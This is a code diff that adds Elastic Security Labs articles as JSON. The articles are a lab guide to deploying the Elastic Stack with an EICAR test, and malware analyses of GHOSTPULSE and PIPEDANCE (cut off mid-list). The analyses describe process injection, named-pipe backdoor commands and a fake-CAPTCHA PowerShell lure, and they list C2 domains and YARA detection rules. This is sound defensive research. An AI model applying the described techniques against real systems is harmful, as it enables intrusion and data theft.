leave this in Prevent mode.\n\nNext, scroll to the bottom and select the “Register as antivirus” toggle and click on the “Show advanced settings” hyperlink.\n\n\n\nScroll down to **windows.advanced.memory_protection.shellcode_collect_sample** , **windows.advanced.memory_protection.memory_scan_collect_sample** , and **windows.advanced.memory_protection.shellcode_enhanced_pe_parsing** options and set the value to **true**.\n\n\n\n> As mentioned above, these steps are for labs, sandboxes, testing, etc. These settings can generate a lot of data, so setting these for production will need resourcing and sizing considerations.\n\nIf you’re making a policy for Linux or macOS, repeat these for the proper OS.\n\nOnce we’re done with all of the post-installation configurations, we can click the blue Save integration button.\n\n## Enabling Elastic’s Prebuilt Detection Rules\n\nNow that we have created our Fleet agent policy we need to enable the set of pre-built detection rules associated with the OS or platform we will be deploying on (e.g Windows). To do this you will need to go to the Alerts page within the security app.\n\nClick on the hamburger menu and select Alerts, under the Security solution.\n\n\n\nNext, click on the blue Manage Rules button.\n\n\n\nOnce on the Rules page you can update all of the prebuilt rules provided by Elastic by clicking on the “Update Elastic prebuilt rules” button. The update framework is enabled when you go into the “Manage rules” section for the first time, if the “Update Elastic prebuilt rules” button isn’t present, refresh the screen.\n\n\n\nOnce the rules have been updated, you can browse the available detection rules, search them by a number of different patterns or simply filter by tag, which is what we will do here by searching for Windows rules.\n\n\n\nNow we can select all of the Windows rules.\n\n\n\nOnce all of the rules have been selected, we can bulk enable them.\n\n\n\n> As the Elastic Container Project runs completely inside single Docker containers, performance impacts could be noticed if you enable all of the rules available. Explore the different rules and enable or disable them based on your infrastructure and use cases.\n\nAfter we have enabled these rules they will be live and will be run against the data your endpoint agent sends into your stack. When the Detection Engine rules are triggered, they will be raised in the Alerts page in the Security Solution.\n\n## Enrolling an Elastic Agent\n\nStill in Fleet, we have several ways to add an Elastic Agent. The most straightforward is from within the policy that we want to enroll an Elastic Agent into (otherwise you have to specify which policy you want to use). It doesn’t really matter which approach you use, but clicking on the Actions button and then Add agent works from just about anywhere in Fleet.\n\n\n\nScroll down and click on the OS that you’re going to be installing the Elastic Agent on, and copy/paste the instructions directly into a terminal window on the host you’re going to be installing the agent onto. Note, if you’re using Windows, use a Powershell CLI that is running as (or elevated to) an account with administrative entitlements.\n\n\n\nOf note, because all of our TLS certificates are self-signed, we need to append the **–insecure** flag. This is unnecessary if you are using trusted certificates.\n\n```\n**.\\elastic-agent.exe install --url=https://[stack-ip]:8220 --enrollment-token=[token] --insecure**\n```\n\n\n\nBack in Kibana, we can see confirmation that the Elastic Agent installed on the host and that data is being recorded into Elasticsearch.\n\n\n\nWe can see that the Elastic Agent is reporting into Fleet and is healthy.\n\n\n\nIf we go into the Discover tab, we can see various event types reporting into Elasticsearch. We can generate some test data by opening **notepad.exe** , **calc.exe** , and **ping.exe -t www.elastic.co** on the host. From Discover, we can make a simple query to validate that we’re seeing the data:\n\n```\n**process.name.caseless : (notepad.exe or ping.exe or calc.exe)**\n```\n\n\n\nNow that we’ve validated that we’re seeing data. Let's fire some malware!\n\n## Test fire some malware\n\nThere are a lot of places you can download malware from, but for this test, we’ll simply use the industry standard [EICAR anti malware test file](https://www.eicar.org/download-anti-malware-testfile/) to check the functionality.\n\nThe EICAR test is a file that is universally identified by security vendors and is used to test the operation of anti malware software and platforms. It contains a single string and is non-malicious.\n\nFrom within the Windows host, we’ll use Powershell to download the EICAR file.\n\n```\n**Invoke-WebRequest -Uri \"https://secure.eicar.org/eicar.com.txt\" -OutFile \"eicar.txt\"**\n```\n\nAs expected, the event was immediately identified by the Elastic Agent’s security integration.\n\n\n\nAfter a few minutes, the events are recorded into the Security Solution within Kibana. You can get there by clicking on the hamburger menu and then clicking on the Alerts section.\n\n\n\nHere we can see the alert populated.\n\n\n\nIf we click on the Analyzer button, we can dig into the event to identify the process that generated the event.\n\n\n\nIn our example, we can see **powershell.exe** generated the event and this includes the correlated network events - **secure.eicar.org** , which is where the EICAR test file was downloaded from.\n\n\n\n## Summary\n\nIn this publication, we introduced you to the Elastic Stack and an open source project that can be used to quickly and securely stand up the entire stack for testing, labs, and security research.\n\nKibana and the Security Solution are powerful tools that are built by incident responders, threat hunters, and intelligence analysts with security practitioners in mind. To learn more about how to use these tools, [Elastic has some great (free and paid) training](https://www.elastic.co/training/) that can help learn how to use Kibana for threat hunting.\n"
+ },
+ "title": "The Elastic Container Project for Security Research",
+ "slug": "the-elastic-container-project",
+ "subtitle": "Using Docker to stand up the Elastic Stack",
+ "date": "2023-03-01",
+ "description": "The Elastic Container Project provides a single shell script that will allow you to stand up and manage an entire Elastic Stack using Docker. This open source project enables rapid deployment for testing use cases.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "colson-wilhoit"
+ },
+ {
+ "slug": "derek-ditch"
+ }
+ ],
+ "image": "blog-thumb-container-barge.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-the_elastic_container_project-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json
new file mode 100644
index 00000000000..982aaefdc0b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-tricks_and_treats-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Tricks and Treats: GHOSTPULSE’s new pixel-level deception\"\nslug: \"tricks-and-treats\"\ndate: \"2024-10-19\"\ndescription: \"The updated GHOSTPULSE malware has evolved to embed malicious data directly within pixel structures, making it harder to detect and requiring new analysis and detection techniques.\"\nauthor:\n - slug: salim-bitam\nimage: \"tricks-and-treats.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ghostpulse\n - lummastealer\n - ref8207\n---\n\n## Update\n\nThis research covers an update to stage 2 of GHOSTPULSE, [originally disclosed](https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks#stage-2) by Elastic Security Labs in October 2023.\n\n## Key takeaways\n\n1. GHOSTPULSE has shifted from using the IDAT chunk of PNG files to embedding its encrypted configuration and payload within the pixel structure.\n1. Recent campaigns involve tricking victims with creative social engineering techniques, such as CAPTCHA validations that trigger malicious commands through Windows keyboard shortcuts.\n1. Elastic Security has enhanced its YARA rules and updated the configuration extractor tool to detect and analyze both the old and new versions of GHOSTPULSE.\n\n## Preamble\n\nThe GHOSTPULSE malware family (also known as HIJACKLOADER or IDATLOADER) has continuously evolved since its discovery in 2023, evading detection with increasingly developed techniques.\n\nIn its earlier iterations, GHOSTPULSE abused the IDAT chunk of PNG files to hide malicious payloads, as detailed in a [previous article from Elastic Security Labs](https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks). However, recent analysis has uncovered a significant change in its algorithm. Instead of extracting the payload from the IDAT chunk, the latest version of GHOSTPULSE now parses the pixels of the image to retrieve its configuration and payload. This new approach involves embedding malicious data directly within the pixel structure.\n\nIn this research publication, we’ll explore this new pixel-based algorithm and compare it with the previous IDAT chunk technique with updated detection rules.\n\n## Introduction\n\nRecently, we've observed several campaigns involving LUMMA STEALER using GHOSTPULSE as its loader, a topic also explored by [HarfangLab](https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/). These campaigns stand out due to their [creative social engineering tactics](https://www.secureworks.com/blog/fake-human-verification-prompt-delivers-infostealers). Victims are tricked into validating a CAPTCHA, but the website instructs them to execute a series of Windows keyboard shortcuts instead of the usual process. These shortcuts trigger a command copied to the clipboard by malicious JavaScript. This leads to a PowerShell script being executed, initiating the infection chain by downloading and executing a GHOSTPULSE payload.\n\n\n\nIn previous versions of GHOSTPULSE, it was delivered as part of a multi-file package. This package typically contained a benign executable, an infected DLL loaded by the executable, and a PNG file storing the encrypted configuration.\n\nHowever, in the latest version, GHOSTPULSE has streamlined its deployment. Now, the entire package consists of a single file—a benign but compromised executable that includes the PNG file within its resources section.\n\n\n\n## Technical analysis\n\nThe updated second stage of the malware retains much of its previous structure, including using the same hashing algorithm for resolving Windows API names. However, the most significant change is in how the malware now locates its configuration, which holds both the payload and critical instructions for its deployment.\n\nThe following is a screenshot showing the pseudocode of both implementations:\n\n\n\nIn earlier versions, GHOSTPULSE would parse a PNG file for an encrypted data blob, which was divided into chunks and stored sequentially. The malware’s parsing process was straightforward: it would search for a specific marker within the file—in this case, the IDAT string. Once found, the malware would check for a 4-byte tag that followed the string. The encrypted chunk would be extracted if this tag matched the expected value. This process continues for every occurrence of the IDAT string that comes after until the full encrypted payload is collected.\n\nIn the new version, the encrypted configuration is stored in the pixels of the image. The malware constructs a byte array by extracting each pixel's `RED`, `GREEN`, and `BLUE` (RGB) values sequentially using standard Windows APIs from the [GdiPlus(GDI+)](https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start) library. Once the byte array is built, the malware searches for the start of a structure that contains the encrypted GHOSTPULSE configuration, including the XOR key needed for decryption. It does this by looping through the byte array in 16-byte blocks. For each block, the first 4 bytes represent a CRC32 hash, and the next 12 bytes are the data to be hashed. The malware computes the CRC32 of the 12 bytes and checks if it matches the hash. If a match is found, it extracts the offset of the encrypted GHOSTPULSE configuration, its size, and the 4-byte XOR key, and then XOR decrypts it.\n\nThe following diagram provides a visual breakdown of this process:\n\n\n\n## Updated configuration extractor\n\nBased on these findings, we have updated our configuration extractor to support both versions of GHOSTPULSE. This tool takes a PNG file as input and outputs the embedded payload. You can find the updated tool in our [labs-releases repository](https://github.com/elastic/labs-releases/tree/main/tools/ghostpulse).\n\n\n\n## Detecting GHOSTPULSE with YARA\n\nThe original [GHOSTPULSE YARA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostPulse.yar) rule still prevents the final stage of an infection and is built into Elastic Defend. The updated sample can be detected using the following YARA rules and will be included with Elastic Defend in a future release.\n\nElastic Security has updated the GHOSTPULSE YARA rules to identify this activity:\n\n```\nrule Windows_Trojan_GHOSTPULSE_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-10-15\"\n last_modified = \"2024-10-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"GHOSTPULSE\"\n threat_name = \"Windows.Trojan.GHOSTPULSE\"\n license = \"Elastic License v2\"\n\n strings:\n $stage_1 = { 49 63 D0 42 8B 0C 0A 41 03 CA 89 0C 1A 8B 05 ?? ?? ?? ?? 44 03 C0 8B 05 ?? ?? ?? ?? 44 3B C0 }\n $stage_2 = { 48 89 01 48 8B 84 24 D8 00 00 00 48 8B 4C 24 78 8B 49 0C 89 08 C7 44 24 44 00 00 00 00 }\n\n condition:\n any of them\n}\n\nrule Windows_Trojan_GHOSTPULSE_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-10-10\"\n last_modified = \"2024-10-10\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"GHOSTPULSE\"\n threat_name = \"Windows.Trojan.GHOSTPULSE\"\n license = \"Elastic License v2\"\n\n strings:\n $a1 = { 48 83 EC 18 C7 04 24 00 00 00 00 8B 04 24 48 8B 4C 24 20 0F B7 04 41 85 C0 74 0A 8B 04 24 FF C0 89 04 24 EB E6 C7 44 24 08 00 00 00 00 8B 04 24 FF C8 8B C0 48 8B 4C 24 20 0F B7 04 41 83 F8 5C }\n\n condition:\n all of them\n}\n```\n\n## Conclusion\n\nIn summary, the GHOSTPULSE malware family has evolved since its release in 2023, with this recent update marking one of the most significant changes.\n\nAs attackers continue to innovate, defenders must adapt by utilizing updated tools and techniques to mitigate these threats effectively. We are excited to share our newly developed configuration extractor tool, designed to analyze the older and newer versions of GHOSTPULSE. This tool empowers researchers and cybersecurity professionals by providing enhanced capabilities for understanding and combating these evolving threats. As the landscape of cyber threats changes, collaboration, and innovation remain essential for effective protection.\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostpulse) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-----------------|------------------------------------------|\n| `57ebf79c384366162cb0f13de0de4fc1300ebb733584e2d8887505f22f877077` | SHA-256 | `Setup.exe` | GHOSTPULSE sample |\n| `b54d9db283e6c958697bfc4f97a5dd0ba585bc1d05267569264a2d700f0799ae` | SHA-256 | `Setup_light.exe` | GHOSTPULSE sample |\n| `winrar01.b-cdn[.]net` | domain-name | | Infrastructure hosting GHOSTPULSE sample |\n| `reinforcenh[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `stogeneratmns[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `fragnantbui[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `drawzhotdog[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `vozmeatillu[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `offensivedzvju[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `ghostreedmnu[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `gutterydhowi[.]shop` | domain-name | | LUMMASTEALER C2 |\n| `riderratttinow[.]shop` | domain-name | | LUMMASTEALER C2 |"
+ },
+ "title": "Tricks and Treats: GHOSTPULSE’s new pixel-level deception",
+ "slug": "tricks-and-treats",
+ "date": "2024-10-19",
+ "description": "The updated GHOSTPULSE malware has evolved to embed malicious data directly within pixel structures, making it harder to detect and requiring new analysis and detection techniques.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "tricks-and-treats.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ghostpulse",
+ "lummastealer",
+ "ref8207"
+ ]
+ },
+ "id": "security_labs_content-tricks_and_treats-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json
new file mode 100644
index 00000000000..d7c312c78a4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-twice_around_the_dance_floor_with_pipedance-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Twice around the dance floor - Elastic discovers the PIPEDANCE backdoor\"\nslug: \"twice-around-the-dance-floor-with-pipedance\"\ndate: \"2023-02-27\"\nsubtitle: \"Elastic Security Labs describes the PIPEDANCE backdoor\"\ndescription: \"Elastic Security Labs is tracking an active intrusion into a Vietnamese organization using a recently discovered triggerable, multi-hop backdoor we are calling PIPEDANCE. This full-featured malware enables stealthy operations through the use of named\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-12@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref1326\n - pipedance\n---\n\n## Key takeaways\n\n- Elastic Security Labs has identified PIPEDANCE, a previously unknown Windows backdoor used to enable post-compromise and lateral movement activities\n- Built for stealthy operations through named pipes, PIPEDANCE employs capabilities for interactive terminals, discovery/file enumeration, process injection, and data exfiltration checks\n- PIPEDANCE was observed deploying Cobalt Strike\n\n## Preamble\n\nIn late December 2022, Elastic Security Labs observed new activity in a previously monitored environment targeting a Vietnamese organization. This new activity included the execution of a named pipe malware used to facilitate post-compromise activity. We are naming this malware family PIPEDANCE. By leveraging PIPEDANCE, the adversary is able to:\n\n- Disguise activity through a custom function that randomly injects into a hard-coded list of Windows programs\n- Perform discovery by enumerating files and processes\n- Leverage standard backdoor capabilities such as running commands, writing files\n- Check different network protocols for exfiltration\n- Launch additional payloads through process injection techniques\n\nIn this post, we walk through the initial execution then detail the capabilities we have discovered from reviewing the malware.\n\nNote: Check out our follow-on publication on creating your own client to interact with a PIPEDANCE infected endpoint [here](https://www.elastic.co/security-labs/dancing-the-night-away-with-named-pipes).\n\n## Overview\n\nUnlike malware that might communicate with conventional network or application protocols, we identified a binary designed explicitly for lateral movement and post-compromise enablement within a contested environment: executing additional implants, running commands, performing file discovery, enumerating running processes, and checking outbound access; all through the use of Windows named pipes. This kind of functionality is comparable to Cobalt Strike or Metasploit’s SMB modules.\n\n> [Named pipes](https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes) within Windows allow for inter-process communication on a single computer or between processes on separate machines within the same network. Named pipes can be set up for one-way or two-way communication between a pipe client and a pipe server. The data used within named pipes are all stored in memory where it is written and retrieved using standard Windows APIs ( **CreateFile** / **WriteFile** / **ReadFile** ) in the same way as reading/writing files.\n\n[Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was installed after an unknown initial compromise. The [Suspicious Windows Service Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_suspicious_windows_service_execution.toml) behavioral rule generated the first observed events. While unconfirmed, [published research](https://www.microsoft.com/en-us/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/) describes similar techniques by an adversary leveraging execution through a locally-mounted Administrator share and using [Microsoft’s SysInternals DebugView](https://learn.microsoft.com/en-us/sysinternals/downloads/debugview) ( **DbgView.exe** ) utility to load PIPEDANCE.\n\n**DbgView.exe** was observed loading PIPEDANCE into [**makecab.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/makecab), the Windows utility used to package Cabinet files **.** The Windows performance data utility, [**typeperf.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/typeperf), was then injected into and spawned [**openfiles.exe**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/openfiles) where Cobalt Strike was loaded into this process.\n\nWhile **openfiles.exe** binary is a legitimate Microsoft application, Elastic Defend generated a Cobalt Strike memory signature. After extracting the memory regions from the alert in Kibana, we identified the Cobalt Strike module [**invokeassembly.x64.dll**](https://twitter.com/_RastaMouse/status/1104282852869525506?s=20&t=0_v846VUU-A0lE2gxgN_bg), validating that Cobalt Strike was injected into the legitimate **openfiles.exe** binary.\n\n\n\nPIPEDANCE leverages named pipes as a communication mechanism between different infected endpoints within a compromised network. The adversary uses this capability as a bidirectional layer of command and control through which they can dispatch commands and pass data between named pipes.\n\n## Initial set-up / Communication flow\n\nAt the beginning of the main function, there is a hardcoded string used as the pipe name. This string is also used in later stages as an RC4 key to encrypt/decrypt data between pipes. In the image below, we can see the hardcoded pipe name ( **u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe** ) being set as a global variable.\n\n\n\nDuring initial execution, the malware will use the **CreateNamedPipeA** and **ConnectNamedPipe** methods to create the named pipe ( **“\\\\.\\pipe\\u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe**\") and wait for an incoming client process to connect to the pipe. The figure below represents this activity showing the pipe name being formatted with hardcoded string and initializing the pipe.\n\n\n\nDuring the first client connection, PIPEDANCE retrieves the following values from the local system and places them into a buffer:\n\n- Process ID of the PIPEDANCE process\n- Current working directory of the PIPEDANCE process.\n- Domain & Username of the PIPEDANCE process\n\nPIPEDANCE passes this buffer and an 8-byte structure containing the result flag from a **IsWow64Process** evaluation and the buffer size for the subsequent **WriteFile** operation to the pipe. PIPEDANCE then encrypts the buffer containing the previous process details with RC4 and then writes the encrypted data back to the client pipe.\n\n\n\nBelow is a high-level graphic that illustrates the purpose-built lateral movement functionality. With PIPEDANCE infections, the named pipe server process is run on a new victim machine, while the client instructions come from the operator from a previously compromised machine in the same network.\n\n\n\n### Command dispatching\n\nAfter an initial handshake, PIPEDANCE’s primary functionality consists of a while loop with a command dispatching function. This dispatching function will retrieve the provided command ID of its respective function along with any arguments and their size from the operator.\n\n\n\nThe parsing function passes an 8-byte structure consisting of the command instruction and the buffer size for the command argument. The command argument is decrypted using the previous RC4 key, then written back to the pipe.\n\n\n\nOnce the command ID has been received, PIPEDANCE performs several conditional checks using if/else and switch statements.\n\n\n\nThe majority of the command functions return a result flag or error code to the operator. For some functions that may return large amounts of data, such as a list of running processes, the malware generates a new named pipe using the hardcoded string described earlier. Then it concatenates the PID of the PIPEDANCE process which sends and receives the data over this pipe.\n\n\n\n## Command functionality\n\nPIPEDANCE supports more than 20 different functions, each accessed using their command ID via if/then and switch/case logic. Below is an example of the first 4 functions.\n\n\n\n### Command handling table\n\n| Command ID | Description |\n| ---------- | ---------------------------------------------------------------------------------------------------- |\n| 0x1 | Terminates process based on provided PID |\n| 0x2 | Run a single command through cmd.exe, returns output |\n| 0x3 | Terminal shell using stdin/stdout redirection through named pipes |\n| 0x4 | File enumeration on current working directory |\n| 0x6 | Create a new file with content from pipe |\n| 0x7 | Retrieve current working directory |\n| 0x8 | Set current working directory |\n| 0x9 | Get running processes |\n| 0x16 | Perform injection (thread hijacking or Heaven’s Gate) with stdin/stdout option for the child process |\n| 0x18 | Perform injection from hardcoded list (thread hijacking or Heaven’s Gate) |\n| 0x1A | Perform injection on provided PID (thread hijacking or Heaven’s Gate) |\n| 0x3E | Clear out global variable/pipe data |\n| 0x47 | Connectivity check via HTTP Get Request |\n| 0x48 | Connectivity check via DNS with providing DNS Server IP |\n| 0x49 | Connectivity check via ICMP |\n| 0x4A | Connectivity check via TCP |\n| 0x4B | Connectivity check via DNS without providing DNS Server IP |\n| 0x63 | Disconnect pipe, close handle, exit thread |\n| 0x64 | Disconnect pipe, close handle, exit process, exit thread |\n\nIn order to detail the significant capabilities of PIPEDANCE, we’ve split our analysis into three sections:\n\n- Standard backdoor functionality\n- Network connectivity checks\n- Process Injection techniques\n\n### Backdoor functionality\n\nPIPEDANCE offers various interactive backdoor capabilities needed by an operator in order to perform reconnaissance, and pivot through different systems.\n\n#### Command execution\n\nThere are two functions related to command execution, **Function 0x2** and **0x3**. The first method ( **Function 0x2** ) accepts a command argument from the terminal, such as **ipconfig**. This function starts by creating an anonymous named pipe with read and write handles. Before creating the process, PIPEDANCE will configure the **STARTUPINFO** structure using **STARTF_USESTDHANDLES** to pipe the command output ( **hStdOutput** ) for the new process.\n\n\n\nA thread is then created passing the previous read pipe handle as an argument. Memory is allocated for the command output and read from this read pipe handle. The data is then looped over and encrypted in a similar manner as before and sent back through a new named pipe. In our example, this is the data from the **ipconfig** command.\n\n\n\nThe second execution command ( **Function 0x3** ) creates a new **cmd.exe** process in a suspended state and also leverages **STARTF_USESTDHANDLES** as before.\n\n\n\nAfter the process is created, a new thread is created passing the **STARTUPINFO** where two named pipe server processes are created for input and output and the thread is resumed.\n\n\n\nThis functionality operates similarly to a reverse shell, where the attacker has the ability to directly interact and pass data back and forth.\n\n#### Discovery and enumeration\n\nPIPEDANCE has built-in functionality related to discovery and enumeration. For process enumeration ( **Function 0x9** ), it leverages the **CreateToolhelp32Snapshot** function to retrieve the process details. The function returns the process ID, the name of the process, the architecture of the process, whether a process is tied to a system (Session represented as a **0** ) or user session (Session represented as a **1** ), and the username associated with the process.\n\n\n\nInterestingly, in our observations with a few different modules, the results are mangled by the developer due to formatting the data with the C runtime library function **vsprintf_s** when working with Unicode data. This can be observed below in the process discovery module where the process name output gets mangled whereas PIPEDANCE only returns the first character of the process, architecture, and usernames. Below is the output table returned to the operator. In this example, PID **564** with a (mangled) “Name” of **w** is actually PID **564** with a full process name of **winlogon.exe** , a full architecture name of **x86** , a session ID of **1** , and a full user name of **NT AUTHORITY\\SYSTEM** , etc.\n\n\n\nPIPEDANCE implements a terminal-like concept where it has a current or working directory for its process. This enables the adversary to use functions directly tied to the working directory, such as the file enumeration modules.\n\nFor file enumeration, PIPEDANCE will use a wildcard to pull back a file listing from the current working directory.\n\n\n\nPIPEDANCE also offers functionality for creating files and writing content to files on the victim machine ( **Function 0x6** ). It does this by first creating and naming a file on the victim machine, then it creates a new thread with a new instance of a named pipe that will then wait for and read incoming data over the pipe. This data is XOR’d with the previous RC4 key and then written to the file.\n\n\n\nPIPEDANCE also has various administrator or maintenance commands used to terminate processes, terminate threads, disconnect pipes, clear global variables from memory, etc.\n\n### Network connectivity checks\n\nAs adversaries pivot and move through a network, one of their objectives is understanding where the endpoint sits inside the network and determining what protocols are available for shipping data laterally or externally. PIPEDANCE is specifically built to identify exit points on an endpoint by checking DNS, ICMP, TCP, and HTTP protocols.\n\n\n\nAs an example, PIPEDANCE will make a DNS request to bing[.]com when providing a DNS server as an argument, the result of the query will be returned back to the operator indicating success or not. For ICMP, PIPEDANCE will generate fake data for the ICMP request by looping over the alphabet and sending it to a provided IP address.\n\n\n\n\n\nSimilarly for HTTP, the operator can provide a domain where PIPEDANCE will perform a vanilla HTTP GET request over port 80 and then return a boolean value for success or not.\n\n\n\nThese are straightforward functions, but they provide great insight into the developer’s mindset and the type of objectives they are trying to achieve. These checks are likely used in a multi-stage process where these protocols are verified first in a lightweight method then additional shellcode/payloads are launched afterward.\n\n### Process injection techniques\n\nIn a similar fashion to many post-exploitation frameworks, PIPEDANCE leverages different forms of process injection to execute shellcode and launch additional implants. Depending on the process architecture, the malware will perform injection using a standard thread execution hijacking technique or the [Heaven’s Gate technique](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/).\n\n\n\nPIPEDANCE utilizes defense evasions to obscure their activity by randomly picking a Windows program from a hardcoded list to use as an injection target.\n\nThis method generates a seed value based on the current time and passes it to a pseudorandom number generator that returns a value between 0 and 5. This value determines which of 6 hard-coded binaries ( **makecab.exe** , **typeperf.exe** , **w32tm.exe** , **bootcfg.exe** , **diskperf.exe** , **esentutl.exe** ) is used.\n\n\n\nBelow is an example of the Windows APIs used with the thread hijacking technique when PIPEDANCE is running under a 32-bit architecture.\n\n\n\nIf the processor architecture is 64-bit, PIPEDANCE will use the Heaven’s Gate technique calling Native API functions ( **NtGetContextThread** , **NtWriteVirtualMemory** , **RtlCreateUserThread** ), switching the CPU to 64-bit, and executing shellcode.\n\n\n\n\n\nPIPEDANCE also supports other methods of injection using **CreateRemoteThread** or through a Heaven’s Gate call to **RtlCreateUserThread**. With this function, instead of choosing from the previously hardcoded list, the operator provides the PID for the injection target.\n\n\n\n## Summary\n\nPIPEDANCE is designed to conduct covert operations using named pipes and has various features to enable the post-compromise stage. In terms of capabilities, it reminds us of an offensive attack framework's SMB module, but with its own customization. While leveraging named pipes is not a novel technique, it's interesting to see how it's been implemented as a command and control internal proxy and represents an in-house development capability.\n\n## Detection logic\n\n### Prevention\n\n- Memory Threat Prevent Alert: Shellcode Injection\n\n### Detection\n\n- [Suspicious Windows Service Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_suspicious_windows_service_execution.toml)\n- [NullSessionPipe Registry Modification](https://www.elastic.co/guide/en/security/current/nullsessionpipe-registry-modification.html)\n- [Potential Lateral Tool Transfer via SMB Share](https://www.elastic.co/guide/en/security/master/potential-lateral-tool-transfer-via-smb-share.html)\n\n#### Hunting queries\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n##### KQL queries\n\nUsing the Discover app in Kibana, the below query will identify network connections coming from the hardcoded injection targets within PIPEDANCE.\n\n```\nprocess.name:(\"makecab.exe\" or \"typeperf.exe\" or \"w32tm.exe\" or \"bootcfg.exe\" or \"diskperf.exe\" or \"esentutl.exe\") and event.dataset: endpoint.events.network\n```\n\n#### YARA\n\nElastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PipeDance.yar) to identify this activity. Below is the YARA rule to identify PIPEDANCE.\n\n```\nrule Windows_Trojan_PipeDance {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-02-02\"\n last_modified = \"2023-02-02\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"PipeDance\"\n threat_name = \"Windows.Trojan.PipeDance\"\n license = \"Elastic License v2\"\n strings:\n $str1 = \"%-5d %-30s %-4s %-7d %s\" wide fullword\n $str2 = \"PID Name Arch Session User\" wide fullword\n $str3 = \"%s %7.2f B\" wide fullword\n $str4 = \"\\\\\\\\.\\\\pipe\\\\%s.%d\" ascii fullword\n $seq_rc4 = { 8D 46 ?? 0F B6 F0 8A 14 3E 0F B6 C2 03 C1 0F B6 C8 89 4D ?? 8A 04 0F 88 04 3E 88 14 0F 0F B6 0C 3E 0F B6 C2 03 C8 0F B6 C1 8B 4D ?? 8A 04 38 30 04 0B 43 8B 4D ?? 3B 5D ?? 72 ?? }\n $seq_srv_resp = { 8B CE 50 6A 04 5A E8 ?? ?? ?? ?? B8 00 04 00 00 8D 4E ?? 50 53 8B D0 E8 ?? ?? ?? ?? B8 08 02 00 00 8D 8E ?? ?? ?? ?? 50 57 8B D0 E8 ?? ?? ?? ?? }\n $seq_cmd_dispatch = { 83 FE 29 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE 06 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 33 D2 2B C2 0F 84 ?? ?? ?? ?? 83 E8 01 }\n $seq_icmp = { 59 6A 61 5E 89 45 ?? 8B D0 89 5D ?? 2B F0 8D 04 16 8D 4B ?? 88 0A 83 F8 77 7E ?? 80 E9 17 88 0A 43 42 83 FB 20 }\n condition:\n 4 of ($str*) or 2 of ($seq*)\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Lateral 